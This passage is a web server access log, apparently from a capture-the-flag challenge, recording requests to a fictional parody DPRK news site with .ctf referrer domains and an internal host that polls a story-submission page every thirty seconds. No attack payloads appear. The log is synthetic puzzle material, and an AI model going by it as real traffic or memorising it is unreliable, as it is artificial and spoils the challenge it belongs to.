(KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53" +96.40.127.105 - - [23/Jul/2020:11:42:23 -0500] "GET /en/sudoku/ HTTP/1.0" 200 5392 "http://www.nkcna.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36" +192.168.51.66 - - [23/Jul/2020:11:42:25 -0400] "GET /submit_story.html HTTP/1.1" 200 1169 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko" +76.113.201.246 - - [23/Jul/2020:11:42:27 -0500] "GET /stem-cell-implantation-widely-introduced-in-dprk/ HTTP/1.1" 200 11556 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/602.3.12 (KHTML, like Gecko) Version/10.0.2 Safari/602.3.12" +12.66.134.6 - - [23/Jul/2020:11:42:30 -0500] "GET /quality-waterproof-liquid-made/ HTTP/1.1" 200 9560 "-" "Mozilla/5.0 (Windows NT 6.1; rv:51.0) Gecko/20100101 Firefox/51.0" +11.146.66.223 - - [23/Jul/2020:11:42:33 -0500] "GET / HTTP/1.1" 400 4594 "http://www.nkcna.ctf" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0" +36.239.130.107 - - [23/Jul/2020:11:42:37 -0500] "GET /pyongyang-medical-science-symposium-on-neurosurgery-held/ HTTP/1.0" 200 5781 "http://www.pyingyongtoday.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36" +181.41.95.190 - - [23/Jul/2020:11:42:38 -0500] "GET /dancing-parties-held/ HTTP/1.1" 404 5286 "http://www.nkcna.ctf" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36" +108.31.121.208 - - [23/Jul/2020:11:42:42 -0500] "GET / HTTP/1.1" 200 2434 "http://www.google.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.76 Safari/537.36" +210.206.217.59 - - [23/Jul/2020:11:42:44 -0500] "GET /us-troops-had-better-quit-south-korea-in-good-time/ HTTP/1.0" 200 11596 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" +158.97.222.134 - - [23/Jul/2020:11:42:47 -0500] "POST /en/tele-education-system-upgraded/ HTTP/1.1" 400 6602 "-" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36" +26.149.173.220 - - [23/Jul/2020:11:42:50 -0500] "GET /dprk-figure-skaters-prove-successful-in-asian-cup-tournament/ HTTP/1.1" 200 5122 "http://www.nkcna.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:50.0) Gecko/20100101 Firefox/50.0" +173.200.205.21 - - [23/Jul/2020:11:42:52 -0500] "GET /kim-jong-un-visits-taedonggang-pig-farm/ HTTP/1.1" 200 3001 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" +238.87.168.119 - - [23/Jul/2020:11:42:53 -0500] "POST /pyingpong-puppet-company/ HTTP/1.1" 200 11374 "http://www.nkcna.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/537.75.14" +71.179.208.90 - - [23/Jul/2020:11:42:55 -0500] "GET /en/tele-mushroom-cultivation-technology-dissemination-system-developed-in-dprk/ HTTP/1.0" 200 5082 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:30.0) Gecko/20100101 Firefox/30.0" +192.168.51.66 - - [23/Jul/2020:11:42:55 -0400] "GET /submit_story.html HTTP/1.1" 200 1169 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko" +59.149.245.7 - - [23/Jul/2020:11:42:56 -0500] "GET /distance-surgery-aid-network-built-in-dprk/ HTTP/1.1" 200 6606 "http://www.nkcna.ctf" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:51.0) Gecko/20100101 Firefox/51.0" +73.145.124.199 - - [23/Jul/2020:11:42:59 -0500] "GET / HTTP/1.1" 200 2679 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0" +203.98.132.113 - - [23/Jul/2020:11:43:00 -0500] "GET /en/tele-education-system-upgraded/ HTTP/1.1" 200 7894 "http://www.nkcna.ctf" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" +179.241.210.133 - - [23/Jul/2020:11:43:01 -0500] "GET /en/ HTTP/1.1" 500 13865 "http://www.google.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/537.75.14" +201.230.180.36 - - [23/Jul/2020:11:43:05 -0500] "GET /ultimate-technology/ HTTP/1.1" 200 8516 "http://www.foxnews.ctf" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0" +233.78.95.86 - - [23/Jul/2020:11:43:06 -0500] "GET / HTTP/1.1" 200 3709 "http://www.nkcna.ctf" "Mozilla/5.0 (Linux; U; Android 2.3.5; en-us; HTC Vision Build/GRI40) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1" +156.251.38.144 - - [23/Jul/2020:11:43:07 -0500] "GET /en/ HTTP/1.1" 200 13479 "http://www.pyingyongtoday.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" +23.241.29.158 - - [23/Jul/2020:11:43:08 -0500] "GET /kim-il-sungs-feats-for-liberation-of-korea-lauded/ HTTP/1.1" 200 3024 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.75 Safari/537.36" +23.74.30.134 - - [23/Jul/2020:11:43:10 -0500] "GET /many-medical-scientific-achievements-made/ HTTP/1.0" 200 3779 "http://www.yahoo.ctf" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0; Trident/5.0)" +37.66.200.215 - - [23/Jul/2020:11:43:14 -0500] "GET /pyingpong-puppet-company/ HTTP/1.1" 301 6742 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:30.0) Gecko/20100101 Firefox/30.0" +222.134.237.61 - - [23/Jul/2020:11:43:15 -0500] "POST /en/tele-education-system-upgraded/ HTTP/1.0" 500 12057 "http://www.pyingyongtoday.ctf" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" +250.96.34.20 - - [23/Jul/2020:11:43:17 -0500] "GET /en/ HTTP/1.1" 200 13921 "http://www.nkcna.ctf" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" +188.79.46.249 - - [23/Jul/2020:11:43:19 -0500] "GET /en/deep-pan-or-classic/ HTTP/1.1" 200 10141 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:51.0) Gecko/20100101 Firefox/51.0" +24.108.220.220 - - [23/Jul/2020:11:43:23 -0500] "GET /tele-education-system-upgraded/ HTTP/1.1" 200 2275 "http://www.nkcna.ctf" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:51.0) Gecko/20100101 Firefox/51.0" +184.144.60.135 - - [23/Jul/2020:11:43:24 -0500] "GET /en/deep-pan-or-classic/ HTTP/1.1" 200 14352 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:30.0) Gecko/20100101 Firefox/30.0" +192.168.51.66 - - [23/Jul/2020:11:43:26 -0400] "GET /submit_story.html HTTP/1.1" 200 1169 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko" +19.119.46.58 - - [23/Jul/2020:11:43:27 -0500] "GET /en/loving-care-for-people-source-of-dprks-invincibility/ HTTP/1.1" 200 7302 "http://www.foxnews.ctf" "Mozilla/5.0 (Windows; U; MSIE 9.0; WIndows NT 9.0; en-US))" +226.223.127.6 - - [23/Jul/2020:11:43:31 -0500] "POST /pyongyang-medical-science-symposium-on-neurosurgery-held/ HTTP/1.1" 200 7206 "http://www.northkiringulbestkiringul.ctf" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.76 Safari/537.36" +193.142.45.41 - - [23/Jul/2020:11:43:35 -0500] "POST /en/ HTTP/1.1" 301 7004 "http://www.nkcna.ctf" "Mozilla/5.0 (Windows NT 6.2; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0" +199.98.247.67 - - [23/Jul/2020:11:43:39 -0500] "GET /en/tele-mushroom-cultivation-technology-dissemination-system-developed-in-dprk/ HTTP/1.1" 200 6279 "http://www.nkcna.ctf" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0" +97.220.1.241 - - [23/Jul/2020:11:43:41 -0500] "GET /pyingpong-puppet-company/ HTTP/1.1" 200 7207 "http://www.nkcna.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.76.4 (KHTML, like Gecko) Version/6.1.4 Safari/537.76.4" +121.65.7.188 - - [23/Jul/2020:11:43:43 -0500] "GET /distance-surgery-aid-network-built-in-dprk/ HTTP/1.1" 200 12026 "http://www.pyingyongtoday.ctf" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.76 Safari/537.36" +54.49.67.121 - - [23/Jul/2020:11:43:44 -0500] "GET /dprk-figure-skaters-prove-successful-in-asian-cup-tournament/ HTTP/1.1" 200 14283 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.77.4 (KHTML, like Gecko) Version/7.0.5 Safari/537.77.4" +235.157.55.68 - - [23/Jul/2020:11:43:46 -0500] "GET /mens-premier-soccer-league-for-torch-cup-in-dprk/ HTTP/1.1" 200 8221 "http://www.nkcna.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36" +226.169.24.229 - - [23/Jul/2020:11:43:47 -0500] "POST /en/pyingpong-orphans-secondary-school-completed/ HTTP/1.1" 200 13246 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36" +168.202.74.243 - - [23/Jul/2020:11:43:50 -0500] "GET /lair-of-king-tongmyongs-unicorn-reconfirmed-in-dprk/ HTTP/1.1" 200 14274 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/34.0.1847.116 Chrome/34.0.1847.116 Safari/537.36" +159.244.79.176 - - [23/Jul/2020:11:43:51 -0500] "GET / HTTP/1.1" 200 7664 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/34.0.1847.116 Chrome/34.0.1847.116 Safari/537.36" +217.87.232.7 - - [23/Jul/2020:11:43:55 -0500] "GET /performance-of-revolutionary-opera-goes-on-in-dprk/ HTTP/1.0" 200 13244 "http://www.nkcna.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10" +192.168.51.66 - - [23/Jul/2020:11:43:56 -0400] "GET /submit_story.html HTTP/1.1" 200 1169 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko" +99.42.183.216 - - [23/Jul/2020:11:43:56 -0500] "GET /tele-mushroom-cultivation-technology-dissemination-system-developed-in-dprk/ HTTP/1.1" 200 11136 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)" +138.235.216.65 - - [23/Jul/2020:11:44:00 -0500] "POST /kumdang-2-injection-manufactured/ HTTP/1.1" 200 14508 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.76 Safari/537.36" +91.191.198.181 - - [23/Jul/2020:11:44:04 -0500] "POST /en/north-kiringul-missile-program/ HTTP/1.1" 200 4270 "http://www.pyingyongtoday.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.77.4 (KHTML, like Gecko) Version/6.1.5 Safari/537.77.4" +232.232.79.178 - - [23/Jul/2020:11:44:05 -0500] "GET /en/loving-care-for-people-source-of-dprks-invincibility/ HTTP/1.1" 200 7004 "-" "Mozilla/5.0 (Windows NT 6.1; rv:45.0) Gecko/20100101 Firefox/45.0" +76.140.231.19 - - [23/Jul/2020:11:44:09 -0500] "GET /art-performances-of-kpa-officers-wives-given-before-full-house/ HTTP/1.1" 200 13765 "-" "Mozilla/5.0 (Linux; U; Android 2.3.5; en-us; HTC Vision Build/GRI40) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1" +151.106.88.224 - - [23/Jul/2020:11:44:10 -0500] "GET / HTTP/1.1" 200 8587 "http://www.nkcna.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36" +194.27.227.191 - - [23/Jul/2020:11:44:13 -0500] "POST / HTTP/1.0" 200 12485 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" +87.140.4.169 - - [23/Jul/2020:11:44:17 -0500] "POST / HTTP/1.1" 301 4590 "http://www.pyingyongtoday.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:29.0) Gecko/20100101 Firefox/29.0" +60.94.99.68 - - [23/Jul/2020:11:44:21 -0500] "POST /tele-mushroom-cultivation-technology-dissemination-system-developed-in-dprk/ HTTP/1.1" 200 4931 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:51.0) Gecko/20100101 Firefox/51.0" +193.208.107.44 - - [23/Jul/2020:11:44:25 -0500] "GET /en/performance-of-revolutionary-opera-goes-on-in-dprk/ HTTP/1.1" 403 5517 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36" +192.168.51.66 - - [23/Jul/2020:11:44:26 -0400] "GET /submit_story.html HTTP/1.1" 200 1169 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko" +206.156.190.90 - - [23/Jul/2020:11:44:29 -0500] "GET /en/tablet-computer-popular-in-dprk/ HTTP/1.1" 200 6698 "http://www.google.ctf" "Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko" +117.75.137.251 - - [23/Jul/2020:11:44:33 -0500] "GET /pyingpong-puppet-company/ HTTP/1.1" 400 3734 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36" +101.31.214.10 - - [23/Jul/2020:11:44:37 -0500] "GET /us-troops-had-better-quit-south-korea-in-good-time/ HTTP/1.1" 200 8686 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0" +158.40.132.86 - - [23/Jul/2020:11:44:41 -0500] "GET /kim-jong-un-guides-strategic-submarine-underwater-ballistic-missile-test-fire/ HTTP/1.0" 400 3991 "http://www.nkcna.ctf" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)" +45.80.109.222 - - [23/Jul/2020:11:44:45 -0500] "POST /soy-based-dishes-popular-at-cooking-festival/ HTTP/1.1" 200 12979 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 10_2_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) CriOS/56.0.2924.79 Mobile/14D27 Safari/602.1" +239.250.166.157 - - [23/Jul/2020:11:44:47 -0500] "GET /sudoku/ HTTP/1.1" 200 12754 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36" +7.219.200.109 - - [23/Jul/2020:11:44:49 -0500] "GET /en/tele-mushroom-cultivation-technology-dissemination-system-developed-in-dprk/ HTTP/1.1" 200 5115 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36" +189.249.27.42 - - [23/Jul/2020:11:44:52 -0500] "GET /art-performances-of-kpa-officers-wives-given-before-full-house/ HTTP/1.0" 200 12905 "http://www.pyingyongtoday.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36" +166.162.203.110 - - [23/Jul/2020:11:44:55 -0500] "GET /mens-premier-soccer-league-for-torch-cup-in-dprk/ HTTP/1.1" 200 14219 "http://www.nkcna.ctf" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36" +192.168.51.66 - - [23/Jul/2020:11:44:56 -0400] "GET /submit_story.html HTTP/1.1" 200 1169 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko" +135.122.24.196 - - [23/Jul/2020:11:44:57 -0500] "GET /en/lair-of-king-tongmyongs-unicorn-reconfirmed-in-dprk/ HTTP/1.0" 200 12420 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" +29.7.124.60 - - [23/Jul/2020:11:44:59 -0500] "POST /greetings-to-kim-jong-un-from-v-putin/ HTTP/1.1" 400 9944 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/602.3.12 (KHTML, like Gecko) Version/10.0.2 Safari/602.3.12" +23.141.216.218 - - [23/Jul/2020:11:45:02 -0500] "POST /en/tablet-computer-popular-in-dprk/ HTTP/1.1" 200 14041 "http://www.nkcna.ctf" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36" +176.77.62.214 - - [23/Jul/2020:11:45:04 -0500] "GET /song-we-are-the-happiest-in-the-world/ HTTP/1.1" 200 2655 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" +7.195.14.127 - - [23/Jul/2020:11:45:06 -0500] "GET /pyingpong-puppet-company/ HTTP/1.1" 200 11652 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)" +43.158.62.131 - - [23/Jul/2020:11:45:07 -0500] "GET /en/ HTTP/1.1" 200 11285 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36" +30.186.180.226 - - [23/Jul/2020:11:45:09 -0500] "GET /stem-cell-implantation-widely-introduced-in-dprk/ HTTP/1.1" 200 9758 "http://www.google.ctf" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36" +39.231.63.167 - - [23/Jul/2020:11:45:10 -0500] "GET /new-books-published-in-dprk/ HTTP/1.1" 200 13294 "http://www.nkcna.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36" +140.56.205.112 - - [23/Jul/2020:11:45:12 -0500] "POST /sports-contest-of-students-of-schools-of-orphans-held/ HTTP/1.1" 200 13966 "http://www.foxnews.ctf" "Mozilla/5.0 (Windows NT 6.1; rv:51.0) Gecko/20100101 Firefox/51.0" +177.197.228.239 - - [23/Jul/2020:11:45:16 -0500] "GET /en/soy-based-dishes-popular-at-cooking-festival/ HTTP/1.1" 301 6929 "http://www.nkcna.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.77.4 (KHTML, like Gecko) Version/7.0.5 Safari/537.77.4" +186.230.237.94 - - [23/Jul/2020:11:45:17 -0500] "GET / HTTP/1.1" 200 14343 "http://www.nkcna.ctf" "Mozilla/5.0 (Windows; U; MSIE 9.0; WIndows NT 9.0; en-US))" +81.224.188.231 - - [23/Jul/2020:11:45:19 -0500] "GET /new-mushroom-research-institute-inaugurated/ HTTP/1.0" 200 11496 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36" +149.154.120.65 - - [23/Jul/2020:11:45:22 -0500] "GET /en/new-books-published-in-dprk/ HTTP/1.1" 500 4862 "-" "Mozilla/5.0 (Windows NT 6.2; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0" +101.95.232.198 - - [23/Jul/2020:11:45:23 -0500] "GET /kim-il-sungs-feats-for-liberation-of-korea-lauded/ HTTP/1.1" 200 11493 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; rv:2.2) Gecko/20110201" +208.87.95.169 - - [23/Jul/2020:11:45:26 -0500] "GET /new-medicine-developed-in-dprk/ HTTP/1.1" 200 9405 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36" +17.8.202.214 - - [23/Jul/2020:11:45:27 -0500] "POST /royal-blood-fresh-elixir-of-life/ HTTP/1.1" 200 3601 "http://www.nkcna.ctf" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)" +94.216.237.218 - - [23/Jul/2020:11:45:28 -0500] "GET /2016-spring-table-tennis-tournament-for-disabled-and-amateurs/ HTTP/1.1" 200 7530 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.76 Safari/537.36" +37.21.155.18 - - [23/Jul/2020:11:45:30 -0500] "GET / HTTP/1.1" 301 13307 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:50.0) Gecko/20100101 Firefox/50.0" +215.180.234.206 - - [23/Jul/2020:11:45:34 -0500] "GET /99-problems/ HTTP/1.1" 200 10415 "-" "Mozilla/5.0 (Windows NT 6.2; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0" +33.119.147.154 - - [23/Jul/2020:11:45:36 -0500] "POST /pyingpong-orphans-secondary-school-completed/ HTTP/1.1" 200 5488 "-" "Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko" +203.148.106.37 - - [23/Jul/2020:11:45:38 -0500] "GET /deep-pan-or-classic/ HTTP/1.1" 200 11824 "http://www.yahoo.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36" +154.51.169.199 - - [23/Jul/2020:11:45:41 -0500] "GET /new-medicine-developed-in-dprk/ HTTP/1.1" 200 3434 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0)" +121.51.2.126 - - [23/Jul/2020:11:45:45 -0500] "POST /en/ HTTP/1.1" 200 13143 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.76.4 (KHTML, like Gecko) Version/7.0.4 Safari/537.76.4" +132.11.233.201 - - [23/Jul/2020:11:45:47 -0500] "POST /art-performances-of-kpa-officers-wives-given-before-full-house/ HTTP/1.1" 200 4223 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0" +87.194.167.56 - - [23/Jul/2020:11:45:51 -0500] "GET /en/lair-of-king-tongmyongs-unicorn-reconfirmed-in-dprk/ HTTP/1.1" 200 3151 "-" "Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko" +216.204.198.236 - - [23/Jul/2020:11:45:54 -0500] "POST /fifa-refereeing-course-held-in-dprk/ HTTP/1.1" 200 3890 "http://www.foxnews.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36" +192.168.51.66 - - [23/Jul/2020:11:45:56 -0400] "GET /submit_story.html HTTP/1.1" 200 1169 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko" +89.65.117.182 - - [23/Jul/2020:11:45:57 -0500] "GET /en/sudoku/ HTTP/1.1" 304 6233 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.76.4 (KHTML, like Gecko) Version/7.0.4 Safari/537.76.4" +154.146.3.6 - - [23/Jul/2020:11:45:58 -0500] "POST / HTTP/1.1" 404 3709 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.77.4 (KHTML, like Gecko) Version/7.0.5 Safari/537.77.4" +143.36.218.195 - - [23/Jul/2020:11:46:00 -0500] "GET /north-kiringul-missile-program/ HTTP/1.1" 200 6531 "http://www.nkcna.ctf" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.100 Safari/537.36" +140.40.38.47 - - [23/Jul/2020:11:46:02 -0500] "GET /latest-rocket/ HTTP/1.0" 403 3118 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:30.0) Gecko/20100101 Firefox/30.0" +57.32.137.197 - - [23/Jul/2020:11:46:04 -0500] "POST /kumdang-2-injection-manufactured/ HTTP/1.0" 404 13341 "http://www.google.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36" +68.202.206.146 - - [23/Jul/2020:11:46:05 -0500] "GET /tablet-computer-popular-in-dprk/ HTTP/1.1" 200 5105 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140610 Firefox/24.0 Iceweasel/24.6.0" +244.84.104.121 - - [23/Jul/2020:11:46:07 -0500] "POST / HTTP/1.0" 200 2585 "http://www.nkcna.ctf" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko" +88.237.19.167 - - [23/Jul/2020:11:46:08 -0500] "GET /en/first-graduation-ceremony-of-tele-education-college-under-kim-chaek-university-of-technology-held/ HTTP/1.1" 403 13384 "http://www.nkcna.ctf" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36" +100.12.242.170 - - [23/Jul/2020:11:46:11 -0500] "GET /nuke-the-chinese/ HTTP/1.1" 200 2499 "http://www.nkcna.ctf" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36" +60.127.109.24 - - [23/Jul/2020:11:46:13 -0500] "GET /en/ HTTP/1.1" 200 10907 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.75 Safari/537.36" +203.191.120.241 - - [23/Jul/2020:11:46:14 -0500] "GET /tablet-computer-popular-in-dprk/ HTTP/1.1" 404 9911 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" +63.158.221.171 - - [23/Jul/2020:11:46:18 -0500] "POST /north-kiringul-missile-program/ HTTP/1.1" 200 9778 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" +3.56.70.117 - - [23/Jul/2020:11:46:20 -0500] "GET /dprk-figure-skaters-prove-successful-in-asian-cup-tournament/ HTTP/1.1" 200 12967 "http://www.pyingyongtoday.ctf" "Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140610 Firefox/24.0 Iceweasel/24.6.0" +32.242.156.196 - - [23/Jul/2020:11:46:24 -0500] "GET /en/kim-il-sungs-feats-for-liberation-of-korea-lauded/ HTTP/1.1" 200 11115 "http://www.nkcna.ctf" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36" +40.164.34.129 - - [23/Jul/2020:11:46:25 -0500] "GET /song-we-are-the-happiest-in-the-world/ HTTP/1.1" 200 3279 "http://www.nkcna.ctf" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 